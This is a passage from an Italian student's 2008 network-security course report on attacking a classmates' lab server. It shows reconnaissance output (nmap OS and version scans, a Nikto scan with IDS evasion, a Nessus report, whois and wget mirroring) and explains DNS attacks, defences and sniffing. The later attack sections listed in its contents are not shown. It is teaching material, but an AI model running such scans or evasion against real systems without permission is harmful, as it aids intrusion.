attacchi al gruppo nic - wordpress.commac address: 00:50:ba:c7:cc:a1 (d -link) warning: osscan...

Cap

ito

lo: P

arte

pri

ma:

INFO

RM

AZI

ON

I GEN

ERA

LI

1

Corso di Sicurezza su reti II

Anno accademico 2007-2008

Prof. A. De Santis

Dott. L. Catuogno

Attacchi al gruppo NIC:

Gruppo HACKER

“Suppongo dunque che sia non un vero Dio, che è la fonte suprema di verità, ma un Demone Malvagio,

astuto e ingannevole quanto potente, che ha dispiegato tutti i suoi artifizi per sconfiggermi. Suppongo

dunque che il paradiso, i cieli, le forme, i suoni, i colori e tutti gli elementi percepibili dalla vista non siano

altro che inganni e illusioni che esso impiega per inglobarmi. Mi considero privo di mani, occhi, corpo,

sangue e sensi; ciò nonostante, mi considero erroneamente in possesso di tutto ciò”

(CARTESIO, “SULLE COSE DI CUI SI PUÒ DUBITARE”)

Versione 0.1

Cap

ito

lo: P

arte

pri

ma:

INFO

RM

AZI

ON

I GEN

ERA

LI

2

SOMMARIO

Parte prima: INFORMAZIONI GENERALI .......................................................................................................... 4

Parte seconda: PREREQUISITI ........................................................................................................................... 5

Raccolta Informazioni .................................................................................................................................... 5

TELNET ........................................................................................................................................................ 5

nslookup ..................................................................................................................................................... 5

wget ............................................................................................................................................................ 5

whois .......................................................................................................................................................... 7

nmap .......................................................................................................................................................... 8

host ........................................................................................................................................................... 10

REPORT DI NIKTO (VULNERABILITA’ WEB) ............................................................................................... 10

REPORT DI NESSUS ................................................................................................................................... 11

VULNERABILITA’ DI UN SERVIZIO DNS ......................................................................................................... 17

Come funziona il DNS ............................................................................................................................... 17

Exploit del DNS ......................................................................................................................................... 17

Difendere il DNS ....................................................................................................................................... 18

Descrizione TECNICHE DI ATTACCO ............................................................................................................. 19

SNIFFING ................................................................................................................................................... 19

DoS ........................................................................................................................................................... 19

SNIFFING ATTIVO/ SPOOFING / CACHE POISON ...................................................................................... 20

DIROTTAMENTO RST ................................................................................................................................ 21

MITM ........................................................................................................................................................ 21

SQL injection ............................................................................................................................................. 22

STRUMENTI SOFTWARE............................................................................................................................... 23

Parte terza: ATTACCHI ED ESITI ...................................................................................................................... 24

Attacco 1 : SQL INJECTION ....................................................................................................................... 24

Esito 1 : SQL INJECTION (FAILED) ............................................................................................................. 24

Attacco 2 : DoS 1 (NEGAZIONE DI ACCESSO AL SERVIZIO DNS) ............................................................... 25

Esito2 : DoS 1 (SUCCESS) .......................................................................................................................... 27

Attacco 3 : DDoS 2 (Degradazione del servizio DNS – ATTACCO FLODDING Distribuito) ........................ 27

Esito 3: DDoS 2 (SUCCESS) ........................................................................................................................ 27

ATTACCHI SPECIFICI AL DNS ........................................................................................................................ 28

Attacco 1 : TENTATIVO DI TRASFERIMENTO DELLE ZONE DEL DNS ......................................................... 28

Esito 1 : TENTATIVO DI TRASFERIMENTO DELLE ZONE DEL DNS (FAILED) ............................................... 29

Attacco 2 : MITM + dns spoofing PHISHING ........................................................................................ 31

Esito 2 : MITM + DNS SPOOFING PHISHING (SUCCESS) ...................................................................... 32

Cap

ito

lo: P

arte

pri

ma:

INFO

RM

AZI

ON

I GEN

ERA

LI

3

Attacco 3 : MITM + arp Poison SSL HACKING ...................................................................................... 33

eSITO 3 : MITM + ARP POISON SSL HACKING (Success) ....................................................................... 37

Parte QUARTA: Note ....................................................................................................................................... 38

Problema Configurazione wireless sotto linux (wpa_supplicant) ............................................................ 38

NOTE : COMANDI ESEGUITI ............................................................................................................................ 40

Riferimenti ...................................................................................................................................................... 41

Cap

ito

lo: P

arte

pri

ma:

INFO

RM

AZI

ON

I GEN

ERA

LI

4

PARTE PRIMA: INFORMAZIONI GENERALI

NOME DEL GRUPPO Hack

DENOMINAZIONE daman3

COMPONENTI

D’AMATO ANGELO 0521000698

MISSIONE Attaccare il gruppo NIC

PROGETTO L’intenzione del gruppo è di realizzare la missione utilizzando tutti gli strumenti Open

Source che risultino affidabili e facilmente reperibili e che naturalmente non

comportano acquisto e rinnovo delle licenze. Ulteriori tool per gli attacchi e maggiori

dettagli verranno forniti nelle fasi successive. Descrivendo le tecniche di attacco

scelte e gli esiti relativi.

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

5

PARTE SECONDA: PREREQUISITI

RACCOLTA INFORMAZIONI

TELNET

NSLOOKUP

WGET

[root@localhost]# telnet www.nic.it

Trying 192.168.0.2...

[root@localhost]# nslookup

> www.nic.it

!!! The server at (default) does not allow recursion.

www.nic.it A 192.168.0.2

[root@localhost]# wget -m -x http://www.nic.it

--2008-06-16 14:57:52-- http://www.nic.it/

Resolving www.nic.it... 192.168.0.2

Connecting to www.nic.it|192.168.0.2|:80... connected.

HTTP request sent, awaiting response... 403 Forbidden

2008-06-16 14:57:52 ERROR 403: Forbidden.

[root@localhost]# wget -m -x https://www.nic.it

--2008-06-16 14:58:09-- https://www.nic.it/

Resolving www.nic.it... 192.168.0.2

Connecting to www.nic.it|192.168.0.2|:443... connected.

ERROR: cannot verify www.nic.it's certificate, issued by

`/C=IT/ST=Italy/L=Fisciano/O=Nic/OU=Nic/CN=Nic/[email protected]':

Self-signed certificate encountered.

ERROR: certificate common name `Nic' doesn't match requested host name `www.nic.it'.

To connect to www.nic.it insecurely, use `--no-check-certificate'.

Unable to establish SSL connection.

http://www.nic.it/

http://www.nic.it/

http://www.nic.it/

https://www.nic.it/

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

6

[root@localhost var]# wget -m -x https://www.nic.it --no-check-certificate --2008-06-19 15:53:59-- https://www.nic.it/ Resolving www.nic.it... 192.168.0.2 Connecting to www.nic.it|192.168.0.2|:443... connected. WARNING: cannot verify www.nic.it's certificate, issued by `/C=IT/ST=Italy/L=Fisciano/O=Nic/OU=Nic/CN=Nic/[email protected]': Self-signed certificate encountered. WARNING: certificate common name `Nic' doesn't match requested host name `www.nic.it'. HTTP request sent, awaiting response... 200 OK Length: 1927 (1.9K) [text/html] Saving to: `www.nic.it/index.html' 100%[======================================================================================>] 1,927 --.-K/s in 0s Last-modified header missing -- time-stamps turned off. 2008-06-19 15:53:59 (38.8 MB/s) - `www.nic.it/index.html' saved [1927/1927] Loading robots.txt; please ignore errors. --2008-06-19 15:53:59-- https://www.nic.it/robots.txt Reusing existing connection to www.nic.it:443. HTTP request sent, awaiting response... 404 Not Found 2008-06-19 15:53:59 ERROR 404: Not Found. --2008-06-19 15:53:59-- https://www.nic.it/registrazione_utente.php Reusing existing connection to www.nic.it:443. HTTP request sent, awaiting response... 200 OK Length: 2733 (2.7K) [text/html] Saving to: `www.nic.it/registrazione_utente.php' 100%[======================================================================================>] 2,733 --.-K/s in 0s Last-modified header missing -- time-stamps turned off. 2008-06-19 15:53:59 (23.6 MB/s) - `www.nic.it/registrazione_utente.php' saved [2733/2733] --2008-06-19 15:53:59-- https://www.nic.it/index.php Reusing existing connection to www.nic.it:443. HTTP request sent, awaiting response... 200 OK Length: 1927 (1.9K) [text/html] Saving to: `www.nic.it/index.php' 100%[======================================================================================>] 1,927 --.-K/s in 0s Last-modified header missing -- time-stamps turned off. 2008-06-19 15:53:59 (24.1 MB/s) - `www.nic.it/index.php' saved [1927/1927] FINISHED --2008-06-19 15:53:59-- Downloaded: 3 files, 6.4K in 0s (26.8 MB/s)

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

7

WHOIS

[root@localhost angelo]# whois nic.it swhoisd 3.0.5 Searching for nic.it. Found 4 record(s) matching nic.it. Domain: (Handle NIC) Name: Gruppo NIC Domain Name: nic.it Country: IT Administrative Contact: Raffaele Email address: [email protected] Host: (Handle NIC) FQDN: www.nic.it IP Address: 192.168.0.2 Administrative Contact: Raffaele Email address: [email protected] Host: (Handle NIC) FQDN: ns.nic.it IP Address: 192.168.0.2 Administrative Contact: Raffaele Email address: [email protected] Host: (Handle NIC) FQDN: whois.nic.it IP Address: 192.168.0.2 Administrative Contact: Raffaele Email address: [email protected] To single out one record, look it up with "!XXX", where XXX is the handle

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

8

NMAP

[root@localhost]# nmap www.nic.it

Starting Nmap 4.65 ( http://nmap.org ) at 2008-06-16 15:01 CEST

Interesting ports on 192.168.0.2:

Not shown: 1710 filtered ports

PORT STATE SERVICE

22/tcp open ssh

43/tcp open whois

53/tcp open domain

80/tcp open http

443/tcp open https

MAC Address: 00:50:BA:C7:CC:A1 (D-link)

Nmap done: 1 IP address (1 host up) scanned in 7.769 seconds

[root@localhost var]# nmap -sS -O www.nic.it Starting Nmap 4.65 ( http://nmap.org ) at 2008-06-19 15:56 CEST Interesting ports on 192.168.0.2: Not shown: 1710 filtered ports PORT STATE SERVICE 22/tcp open ssh 43/tcp open whois 53/tcp open domain 80/tcp open http 443/tcp open https MAC Address: 00:50:BA:C7:CC:A1 (D-link) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.6.X OS details: Linux 2.6.18 - 2.6.22 Uptime: 0.167 days (since Thu Jun 19 11:55:29 2008) Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.669 seconds

http://www.nic.it/

http://www.nic.it/

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

9

[root@localhost angelo]# nmap -A www.nic.it Starting Nmap 4.65 ( http://nmap.org ) at 2008-06-19 19:24 CEST SCRIPT ENGINE: error while initializing Lua State: 'nselib-bin/' not a directory SCRIPT ENGINE: Aborting script scan. Interesting ports on 192.168.0.2: Not shown: 1710 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0) 43/tcp open whois? 53/tcp open domain ISC BIND 9.3.4 80/tcp open http Apache httpd 443/tcp open ssl/http Apache httpd 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port43-TCP:V=4.65%I=7%D=6/19%Time=485A9659%P=i686-pc-linux-gnu%r(Generi SF:cLines,27,"swhoisd\x203\.0\.5\r\nRequest\x20is\x20too\x20short\r\n\r\n" SF:)%r(GetRequest,5D,"swhoisd\x203\.0\.5\r\nSearching\x20for\x20get\x20/\x SF:20http/1\.0\.\x20\x20\r\nNo\x20records\x20matching\x20get\x20/\x20http/ SF:1\.0\x20found\.\r\n\r\n")%r(HTTPOptions,65,"swhoisd\x203\.0\.5\r\nSearc SF:hing\x20for\x20options\x20/\x20http/1\.0\.\x20\x20\r\nNo\x20records\x20 SF:matching\x20options\x20/\x20http/1\.0\x20found\.\r\n\r\n")%r(RTSPReques SF:t,65,"swhoisd\x203\.0\.5\r\nSearching\x20for\x20options\x20/\x20rtsp/1\ SF:.0\.\x20\x20\r\nNo\x20records\x20matching\x20options\x20/\x20rtsp/1\.0\ SF:x20found\.\r\n\r\n")%r(Help,49,"swhoisd\x203\.0\.5\r\nSearching\x20for\ SF:x20help\.\x20\x20\r\nNo\x20records\x20matching\x20help\x20found\.\r\n\r SF:\n")%r(SSLSessionReq,27,"swhoisd\x203\.0\.5\r\nRequest\x20is\x20too\x20 SF:short\r\n\r\n")%r(FourOhFourRequest,A3,"swhoisd\x203\.0\.5\r\nSearching SF:\x20for\x20get\x20/nice%20ports%2c/tri%6eity\.txt%2ebak\x20http/1\.0\.\ SF:x20\x20\r\nNo\x20records\x20matching\x20get\x20/nice%20ports%2c/tri%6ei SF:ty\.txt%2ebak\x20http/1\.0\x20found\.\r\n\r\n")%r(LPDString,51,"swhoisd SF:\x203\.0\.5\r\nSearching\x20for\x20\x01default\.\x20\x20\r\nNo\x20recor SF:ds\x20matching\x20\x01default\x20found\.\r\n\r\n")%r(SIPOptions,6D,"swh SF:oisd\x203\.0\.5\r\nSearching\x20for\x20options\x20sip:nm\x20sip/2\.0\.\ SF:x20\x20\r\nNo\x20records\x20matching\x20options\x20sip:nm\x20sip/2\.0\x SF:20found\.\r\n\r\n"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.6.X OS details: Linux 2.6.18 - 2.6.22 Uptime: 0.037 days (since Thu Jun 19 18:32:29 2008)

http://www.nic.it/

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

10

HOST

REPORT DI NIKTO (VULNERABILITA’ WEB)

perl nikto.pl -host 192.168.0.2 -evasion 1 -Cgidirs all -C

---------------------------------------------------------------------------

- Nikto 2.02/2.03 - cirt.net

+ Target IP: 192.168.0.2

+ Target Hostname: 192.168.0.2

+ Target Port: 80

+ Using IDS Evasion: Random URI encoding (non-UTF8)

+ Start Time: 2008-06-24 17:31:35

---------------------------------------------------------------------------

+ Server: Apache

+ OSVDB-0: Retrieved X-Powered-By header: PHP/5.2.5

+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft.

See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for

details

+ OSVDB-12184: GET /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP

reveals potentially sensitive information via certain HTTP requests which

contain specific QUERY strings.

+ 17457 items checked: 3 item(s) reported on remote host

+ End Time: 2008-06-24 17:31:48 (13 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

[root@localhost]# host -t ns www.nic.it

!!! The server at (default) does not allow recursion.

Authority section contains (1 record):

nic.it SOA nic.it root.nic.it (

2008052731 ;serial number (version)

43200 ;slave refresh period (12 hours)

3600 ;slave retry interval (1 hour)

1209600 ;slave expire time (2 weeks)

3600 ;negative response TTL (1 hour)

)

http://www.nic.it/

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

11

REPORT DI NESSUS

Repartition of the level of the security problems :

Nessus Scan Report

This report gives details on hosts that were tested and issues that were found. Please follow the recommended steps and

procedures to eradicate these threats.

Scan Details

Hosts which were alive and responding during test 1

Number of security holes found 1

Number of security warnings found 1

Host List

Host(s) Possible Issue

192.168.0.2 Security hole(s) found

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

12

Analysis of Host

Address of Host Port/Service Issue regarding Port

192.168.0.2 domain (53/tcp) No Information

192.168.0.2 ssh (22/tcp) Security notes found

192.168.0.2 https (443/tcp) Security warning(s) found

192.168.0.2 http (80/tcp) Security notes found

192.168.0.2 nicname (43/tcp) No Information

192.168.0.2 general/tcp Security hole found

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

13

Security Issues and Fixes: 192.168.0.2

Type Port Issue and Fix

Informational ssh (22/tcp) An ssh server is running on this port

Nessus ID : 10330

Warning https (443/tcp)

MacOS X creates a hidden file, '.DS_Store' in each directory that has

been viewed with the 'Finder'. This file contains a list of the

contents of the directory, giving an attacker information on the

structure and contents of your website.

Solution: Use a <FilesMatch> directive in httpd.conf to forbid

retrieval of this file:

<FilesMatch '^\.[Dd][Ss]_[Ss]'>

Order allow, deny

Deny from all

</FilesMatch>

and restart Apache.

Risk factor : Medium

(possibly High depending on the sensitivity of your web content)

References:

www.macintouch.com/mosxreaderreports46.html

BID : 3316, 3325

Other references : OSVDB:6694

Nessus ID : 10756

Informational https (443/tcp) A SSLv2 server answered on this port

Nessus ID : 10330

Informational https (443/tcp) A web server is running on this port through SSL

Nessus ID : 10330

Informational https (443/tcp) The remote web server type is :

Apache

and the 'ServerTokens' directive is ProductOnly

Apache does not permit to hide the server type.

Nessus ID : 10107

Informational https (443/tcp)

Synopsis :

Debugging functions are enabled on the remote HTTP server.

Description :

The remote webserver supports the TRACE and/or TRACK methods. TRACE and TRACK

are HTTP methods which are used to debug web server connections.

It has been shown that servers supporting this method are subject to

cross-site-scripting attacks, dubbed XST for "Cross-Site-Tracing", when

used in conjunction with various weaknesses in browsers.

An attacker may use this flaw to trick your legitimate web users to give

him their credentials.

http://cgi.nessus.org/nessus_id.php3?id=10330

http://cgi.nessus.org/bid.php3?bid=3316






Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

14

Solution :

Disable these methods.

See also :

http://www.kb.cert.org/vuls/id/867593

Risk factor :

Low / CVSS Base Score : 2

(AV:R/AC:L/Au:NR/C:P/A:N/I:N/B:N)

Plugin output :

Solution :

Add the following lines for each virtual host in your configuration file :

RewriteEngine on

RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)

RewriteRule .* - [F]

CVE : CVE-2004-2320

BID : 9506, 9561, 11604

Nessus ID : 11213

Informational https (443/tcp) Here is the SSLv2 server certificate:

Certificate:

Data:

Version: 3 (0x2)

Serial Number:

d7:e5:05:cd:96:44:29:fa

Signature Algorithm: sha1WithRSAEncryption

Issuer: C=IT, ST=Italy, L=Fisciano, O=Nic, OU=Nic, CN=Nic/[email protected]

Validity

Not Before: May 27 14:38:47 2008 GMT

Not After : Jun 26 14:38:47 2008 GMT

Subject: C=IT, ST=Italy, L=Fisciano, O=Nic, OU=Nic,

CN=Nic/[email protected]

Subject Public Key Info:

Public Key Algorithm: rsaEncryption

RSA Public Key: (2048 bit)

Modulus (2048 bit):

00:ac:5f:85:ad:a2:0f:a5:5a:75:55:30:73:ec:08:

f3:7f:d0:3e:73:5b:a2:2a:60:f0:ba:66:33:bd:c6:

65:e6:7b:ad:4d:92:85:5c:d3:1c:14:90:67:57:09:

97:cf:7a:3b:31:09:89:bf:25:75:57:e4:dc:d8:30:

51:c2:f5:14:58:57:3b:a7:dc:b3:b8:24:ae:c4:2f:

a5:df:c6:86:24:9f:fd:55:70:14:b4:04:a5:59:c1:

46:e4:af:cc:32:f0:be:10:cd:c4:08:88:89:a2:09:

b2:6a:f6:bd:99:28:f1:c0:92:47:7f:37:8d:d8:91:

2a:cc:e2:f6:55:69:ba:d9:93:6f:32:45:5f:da:42:

2f:70:f3:66:26:ee:e9:da:ff:e3:7e:70:b3:82:c3:

11:54:7a:43:d9:e2:fb:7b:28:1a:6a:10:b4:ee:ff:

d2:43:0d:28:21:11:f6:c9:26:f0:11:8e:9b:5f:3f:

c5:91:87:1b:a3:db:8f:b1:ed:08:e7:92:53:01:bc:

dd:63:f3:8c:4e:3f:92:d1:ad:06:9d:3d:29:26:8c:

96:63:4d:7d:d3:b7:bc:01:c3:d0:29:3b:e7:32:8c:

5a:e2:03:80:18:af:e6:96:96:4b:a4:6a:8c:3d:1e:

ad:9c:06:eb:e1:cd:60:cc:0b:e2:b7:41:db:a8:98:

1f:9b

Exponent: 65537 (0x10001)

X509v3 extensions:

X509v3 Subject Key Identifier:

FA:1F:A8:31:CC:D4:7D:4F:C6:C6:14:DC:10:2B:AC:F8:9C:50:9A:A6

X509v3 Authority Key Identifier:


http://cgi.nessus.org/cve.php3?cve=CVE-2004-2320





Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

15

keyid:FA:1F:A8:31:CC:D4:7D:4F:C6:C6:14:DC:10:2B:AC:F8:9C:50:9A:A6

DirName:/C=IT/ST=Italy/L=Fisciano/O=Nic/OU=Nic/CN=Nic/[email protected]

serial:D7:E5:05:CD:96:44:29:FA

X509v3 Basic Constraints:

CA:TRUE

Signature Algorithm: sha1WithRSAEncryption

a0:2b:24:bc:58:c6:cc:0a:8f:14:92:df:35:02:ab:33:41:fb:

76:ab:ab:1e:57:ae:29:d4:e0:b7:c4:35:e4:8c:ed:f2:0b:f5:

f1:6a:9f:74:a1:90:dc:7e:59:14:a5:99:72:cd:76:96:bb:5a:

08:0b:6c:41:10:19:da:20:25:f6:97:85:b4:7c:68:1b:c4:74:

02:b3:8a:c9:09:28:40:f8:11:96:df:0e:ad:58:83:54:72:76:

82:4e:44:e6:59:56:60:d7:5c:2e:07:c3:2f:9f:93:68:34:a5:

39:0b:1d:ed:52:6b:12:7a:c2:a1:6a:42:a2:4e:a4:95:7c:ac:

37:c8:f7:1a:b2:f9:d8:87:af:60:f8:f3:4f:20:9e:7e:b0:3f:

69:5b:fb:fc:f8:e5:c1:2f:53:b3:db:c7:23:63:a0:86:b7:1a:

6b:89:26:ff:60:f5:22:8a:43:93:0b:7c:22:8c:ec:74:81:eb:

63:9c:99:44:c0:40:c7:30:06:8b:e6:22:15:74:0d:95:71:5c:

31:8a:20:ca:4f:47:7d:db:97:16:7d:38:d2:65:af:3a:a4:e2:

53:1e:41:ad:df:a3:67:e4:40:76:89:58:d8:66:9b:ac:48:54:

20:b4:00:73:b3:98:4f:03:75:19:27:20:49:dc:aa:5e:9a:fc:

fc:75:04:2a

This SSLv2 server also accepts SSLv3 connections.

This SSLv2 server also accepts TLSv1 connections.

Nessus ID : 10863

Informational https (443/tcp) The following directories were discovered:

/phpMyAdmin

While this is not, in and of itself, a bug, you should manually inspect

these directories to ensure that they are in compliance with company

security standards

Other references : OWASP:OWASP-CM-006

Nessus ID : 11032

Informational https (443/tcp) The SSL certificate of the remote service will expire within 60 days, at Jun 26 14:38:47

2008 GMT.

Nessus ID : 15901

Informational http (80/tcp) A web server is running on this port

Nessus ID : 10330

Informational http (80/tcp) The remote web server type is :

Apache

and the 'ServerTokens' directive is ProductOnly

Apache does not permit to hide the server type.

Nessus ID : 10107

Informational http (80/tcp)

Synopsis :

Debugging functions are enabled on the remote HTTP server.

Description :

The remote webserver supports the TRACE and/or TRACK methods. TRACE and TRACK

are HTTP methods which are used to debug web server connections.

It has been shown that servers supporting this method are subject to

cross-site-scripting attacks, dubbed XST for "Cross-Site-Tracing", when

used in conjunction with various weaknesses in browsers.

An attacker may use this flaw to trick your legitimate web users to give






Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

16

him their credentials.

Solution :

Disable these methods.

See also :


Risk factor :

Low / CVSS Base Score : 2

(AV:R/AC:L/Au:NR/C:P/A:N/I:N/B:N)

Plugin output :

Solution :

Add the following lines for each virtual host in your configuration file :

RewriteEngine on

RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)

RewriteRule .* - [F]

CVE : CVE-2004-2320

BID : 9506, 9561, 11604

Nessus ID : 11213

Vulnerability general/tcp

You are running a version of Nessus which is not configured to receive

a full plugin feed. As a result, the security audit of the remote host produced

incomplete results.

To obtain a complete plugin feed, you need to register your Nessus scanner

at http://www.nessus.org/register/ then run nessus-update-plugins to get

the full list of Nessus plugins.

Nessus ID : 9999

Informational general/tcp Information about this scan :

Nessus version : 2.2.9

Plugin feed version : 200610301215

Type of plugin feed : GPL only

Scanner IP : 127.0.0.1

Port scanner(s) : nessus_tcp_scanner

Port range : default

Thorough tests : no

Experimental tests : no

Paranoia level : 1

Report Verbosity : 2

Safe checks : yes

Max hosts : 20

Max checks : 4

Scan duration : unknown (ping_host.nasl not launched?)

Nessus ID : 19506

This file was generated by Nessus, the open-sourced security scanner.


http://cgi.nessus.org/cve.php3?cve=CVE-2004-2320





http://www.nessus.org/register/



http://www.nessus.org/

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

17

VULNERABILITA’ DI UN SERVIZIO DNS

Il layer 7 del modello OSI è il layer dell'applicazione, ovvero lo strato superiore tra tutti quelli previsti da

tale modello e si interfaccia direttamente con le applicazioni e i processi delle applicazioni.

Le applicazioni svolgono un ruolo critico nella sicurezza della rete: possono infatti essere sviluppate in

modo da risultare completamente insicure, da presentare un minimo livello di sicurezza o da essere molto

resistenti agli attacchi.

Molti servizi, quali File Transfer Protocol (FTP), Telnet, Simple Mail Transfer Protocol (SMTP) e Domain

Name System (DNS), sono da talmente tanto tempo disponibili che le minacce che si trovano ad affrontare

oggi non erano state previste all'epoca dello sviluppo. Fra tutti il DNS è fra i bersagli principali..

COME FUNZIONA IL DNS

Nessuna location su Internet possiede tutte le informazioni contenute all'interno del database di DNS. A

livello di root, ci sono 13 server DNS; la maggior parte di questi è situata negli Stati Uniti in strutture

fisicamente sicure. Il DNS è un database distribuito che contiene le informazioni per la mappatura dei nomi

degli host sugli indirizzi IP. Il DNS fornisce un metodo per interrogare le informazioni contenute all'interno

del database. A seconda del tipo di azione che viene eseguita, il DNS impiega sia l'UDP sia il TCP. L'UDP è

solitamente usato nelle query a meno che il lookup o la risposta siano più grandi di 512 byte. Il TCP è usato

sia per lookup più grandi sia per i trasferimenti di zona.

Quando controllate la vostra posta o andate su un sito Web, state solitamente sfruttando un DNS per

tradurre il nome di un host in un indirizzo IP. Di conseguenza, se aprite il vostro browser e vi recate sul sito

SearchNetworking.it, il DNS traduce un Fully Qualified Domain Name (FQDN) nell'indirizzo IP corretto.

Questo processo comincia trasmettendo la richiesta a un servizio sull'host locale denominato RESOLVER.

Tipicamente, il resolver prima controlla la cache locale che contiene le risposte alle richieste recenti.

Inoltre, può anche controllare il file dell'host, che è un file locale adibito a contenere la mappatura degli

host name sugli indirizzi IP. Se le informazioni richieste non sono disponibili né nella cache locale, né

nell'host, il resolver trasmetterà una richiesta al server DNS che l'interfaccia di rete TCP/IP dell'host prevede

venga utilizzato. Al fine di aumentare le prestazioni e diminuire il traffico della rete causato dal DNS, i name

server memorizzeranno nella cache le risposte alle richieste fatte in un certo periodo di tempo. Il periodo di

tempo in cui le informazioni presenti in una risposta rimangono nella cache è determinato dal time-to-live

(TTL) specificato nella risposta stessa.

EXPLOIT DEL DNS

Quando un server di DNS risponde a una richiesta, il messaggio inviato contiene un ID di transazione e le

risposte alle query dell'utente. Se i record di DNS non sono disponibili o sono stati alterati, non è possibile

raggiungere il sito dove si stava tentando di andare o si può essere addirittura collegati al server web

dell'attacker. Ciò è possibile perché il protocollo può essere attaccato in diversi modi. Questi includono:

Utilizzo dei trasferimenti di zona Cache poisoning del DNS Cache snooping del DNS Attacchi man in the middle

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

18

UTILIZZO DEI TRASFERIMENTI DI ZONA

I trasferimenti di zona sono usati per copiare un database del dominio dal server primario al server

secondario. Se un attacker può effettuare un trasferimento di zona con i name server primari o secondari

per un dominio, potrà vedere tutti i record di DNS relativi a tale dominio. Ciò può esporre informazioni

sensibili quali gli schemi degli indirizzi interni. In più, per un attacker è possibile determinare quali indirizzi

IP sono per esempio usati tramite il server Web, l'email o il file transfer.

CACHE POISONING DEL DNS

La seconda tecnica che trattiamo è il Cache poisoning del DNS. Sia i client sia i server di DNS memorizzano

nella cache le risposte per un certo periodo di tempo con lo scopo di aumentare le prestazioni e ridurre il

traffico della rete. Se gli attacker sono in grado di camuffare una risposta a una richiesta del DNS, possono

contaminare la cache del DNS con un record errato. Alterando la cache dei client e dei server del DNS, un

attacker può riorientare il traffico verso host maligni, che possono portare a ulteriori compromissioni. I

predetti attacchi alla root dei server DNS hanno provato questa tecnica, ma hanno anche tentato il denial

of service.

CACHE SNOOPING DEL DNS

Cache snooping del DNS è il processo che porta a determinare se un dato resource record è presente

nella cache. Questo metodo può essere utile per stabilire quali siti ha visitato un determinato navigatore,

quali sono i loro client e i loro clienti e altre informazioni potenzialmente utili per un attacker. È persino

possibile vedere quale software un navigatore sta usando per controllare la presenza di resource record

relativi agli indirizzi dell'aggiornamento dei programmi.

ATTACCHI MAN IN THE MIDDLE

Per concludere, gli attacchi man in the middle (MITM) si hanno quando un attacker intercetta e modifica i

messaggi di DNS sul tragitto di collegamento. In questa situazione, l'attacker può individuare la porta del

source e l'ID della transazione tramite il traffico intercettato. Gli attacchi MITM possono essere usati per

riorientare le vittime dagli indirizzi legittimi a siti maligni. Questo può essere particolarmente utile per gli

attacker che tentano di rubare informazioni personali se i target sono le richieste al DNS per i siti bancari,

finanziari e di e-commerce. Invece di attrarre un utente con un'email come quelle usate solitamente nel

phishing, l'attacker può indirizzare i suoi sforzi verso i record del DNS per i siti legittimi.

DIFENDERE IL DNS

Questi attacchi rappresentano minacce reali, ma per fortuna ci sono alcune difese. Il cache poisoning del

DNS può essere reso più difficile richiedendo al DNS stesso di usare una porta del source e un Id della

transazione casuali. Senza un valore corretto per questi campi, l'attacker non potrà imitare una risposta nel

tentativo di alterare la cache del server. I trasferimenti di zona erano un problema reale alcuni anni fa,

poiché i server Windows 2000 permettevano di default che chiunque ottenesse queste informazioni. Tale

difetto non esiste più in Windows Server 2003. Anche gli attacchi recenti contro la root dei server di DNS

avrebbero potuto essere evitati se gli ISP avessero realizzato un migliore filtraggio del traffico in uscita. Una

soluzione a questo problema viene proposta in RFC 3704.

Nonostante le contromisure discusse sopra siano un buon modo per rendere il DNS più sicuro, devono

essere un punto di partenza e non di arrivo. Non riuscire a risolvere dei problemi associati al DNS lascia

vulnerabili agli attacchi che interessano le applicazioni, il traffico Web, l'email e le comunicazione VoIP che

devono attraversare Internet.

http://www.ietf.org/rfc/rfc3704.txt

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

19

DESCRIZIONE TECNICHE DI ATTACCO

SNIFFING

Lo sniffing è un metodo con cui una persona può compromettere la sicurezza di una rete in modo passivo.

In questo ambiente, per sniffer si intende un programma o uno strumento che monitora in modo passivo

una rete per trovare informazioni utili; nella maggior parte dei casi questi dati riguardano l’autenticazione,

come i nomi utente e le password che consentono di ottenere l’accesso al sistema o alla risorsa.

Le schede di rete filtrano il traffico nell’hardware affinché la macchina collegata veda solo il proprio traffico,

non per ragioni di sicurezza bensì per evitare di sovraccaricare la macchina. Lo sniffing disabilità questo

filtro, ponendo la scheda nella cosiddetta modalità promiscua, mentre il software è regolato

appositamente per occuparsi del flusso di traffico e per analizzarlo o acquisirlo.

Le porte più soggette a sniffing grazie al passaggio in chiaro delle credenziali sono :

1 Informazioni di autenticazione

2 Monitoraggio di telnet (porta 23)

3 Monitoraggio di FTP (porta 21)

4 Monitoraggio di POP (porta 110)

5 Monitoraggio di IMAP (porta 143)

6 Monitoraggio di NNTP (porta 119)

7 Monitoraggio di rexec (porta 512)

8 Monitoraggio di rlogin (porta 513)

